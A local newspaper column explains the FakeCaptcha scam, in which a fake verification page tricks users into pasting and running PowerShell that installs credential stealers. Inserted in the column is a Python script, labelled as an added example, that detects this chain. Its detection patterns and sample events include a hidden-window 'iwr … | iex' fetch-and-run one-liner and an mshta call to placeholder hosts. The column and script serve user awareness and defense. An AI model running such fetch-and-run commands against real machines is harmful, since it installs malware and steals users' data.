By REBECCA RUTHERFORD
Los Alamos
For the Los Alamos Daily Post
You know that annoying “I’m not a robot” checkbox you click seventeen times a day without thinking? Turns out, that automatic, muscle memory click is exactly what cybercriminals are counting on. Yikes!
A nasty scam called FakeCaptcha has been making the rounds, and it is disturbingly simple.
You land on a compromised website, a CAPTCHA pops up, you click “I’m not a robot” and, without knowing it, a PowerShell script gets copied to your clipboard. The fake verification then walks you through three steps: press Win + R to open the Run dialog, press Ctrl + V to paste the clipboard contents, and press Enter to execute it. Congratulations. You just installed malware on your own machine. With your own hands. While trying to prove you were a responsible human person, by helping the nice robots identify traffic lights.
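For the IT staff reading this column: the chain above leaves a recognizable footprint on the victim's machine, because whatever is pasted into the Run dialog is launched by explorer.exe. The following is an added example, not part of the column, that scores process-creation events for that pattern. It assumes the telemetry (for instance Windows Security event 4688 or Sysmon event 1) has already been normalized into parent image, image and command line fields; the sample events are constructed, and the interpreter list beyond PowerShell and the suspicious-flag patterns are the author's assumptions, not something the column states.

```python
"""Score process-creation events for the FakeCaptcha execution chain:
an interpreter started from explorer.exe (the Run dialog path) with a
command line that looks like a hand-pasted one-liner.

Added example, not from the column. Assumes events already normalized
to parent_image / image / command_line; sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Interpreters worth watching when launched from the Run dialog. The
# column names PowerShell; cmd.exe and mshta.exe are added assumptions.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Win+R runs its command through explorer.exe, so that is the parent of interest.
RUN_DIALOG_PARENT = "explorer.exe"

# Command-line traits typical of a pasted one-liner: hidden window,
# encoded payload, bypassed execution policy, remote fetch, eval, URL.
SUSPICIOUS_FLAGS = [
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("execution policy bypass", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    ("download cmdlet", re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I)),
    ("inline eval", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote URL", re.compile(r"https?://", re.I)),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Return (score, reasons); 0 means the event is not an interpreter launch
    or carries none of the traits above."""
    reasons: List[str] = []
    if basename(ev.image) not in INTERPRETERS:
        return 0, reasons
    if basename(ev.parent_image) == RUN_DIALOG_PARENT:
        reasons.append("interpreter launched from explorer.exe (Run dialog path)")
    for label, pattern in SUSPICIOUS_FLAGS:
        if pattern.search(ev.command_line):
            reasons.append(f"suspicious command line: {label}")
    return len(reasons), reasons


def triage(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, List[str]]]:
    """Keep events scoring 2 or more, so a plain 'cmd /c dir' typed into Run
    (one reason) is not an alert, but Run-dialog launch plus any one trait is."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= 2:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample telemetry; the URL host is a placeholder, not a real site.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/x | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
    ProcessEvent(r"C:\Program Files\Vendor\agent.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -File C:\scripts\inventory.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/v.hta"),
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(basename(ev.image), "<-", basename(ev.parent_image))
        for r in reasons:
            print("   ", r)
```

Of the four constructed events, only the first and the last are flagged: the PowerShell launch from explorer.exe collects every trait, the mshta launch collects the Run-dialog parent plus a remote URL, while an innocent `cmd /c dir` from the Run dialog and a management agent running a local script fall below the threshold.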
The danger is the familiarity. CAPTCHAs are everywhere. We click them so many times that we don’t even think about it. This makes it a lot easier to fall for the scam, and cybercriminals are well aware of this.
The consequences are not minor. The malware delivered through these fake CAPTCHAs includes the Lumma Stealer and the Amadey Trojan, which steal passwords, cookies, and cryptocurrency wallet details. Security researchers have also seen it deliver ransomware-linked payloads, with potentially devastating impact on organizations and individuals. And it’s not just sketchy corners of the internet. In at least one documented case, a victim hit the fake CAPTCHA after visiting their own company’s legitimate WordPress site, which had been quietly compromised and turned into a trap.
A real CAPTCHA asks you to identify fire hydrants or other everyday objects. It does not ask you to paste anything into your computer. Ever. If a “verification” step involves opening a Run dialog or a terminal window, close the browser tab and walk away. That is not a security check; your computer is about to be compromised.
It’s easy to fall into a routine and just click through the boxes without thinking, but that can be a dangerous place to be. Take the time to stop and think, figure out if it makes sense, and save yourself from the latest scam.
Editor’s note: Rebecca Rutherford works in information technology at Los Alamos National Laboratory.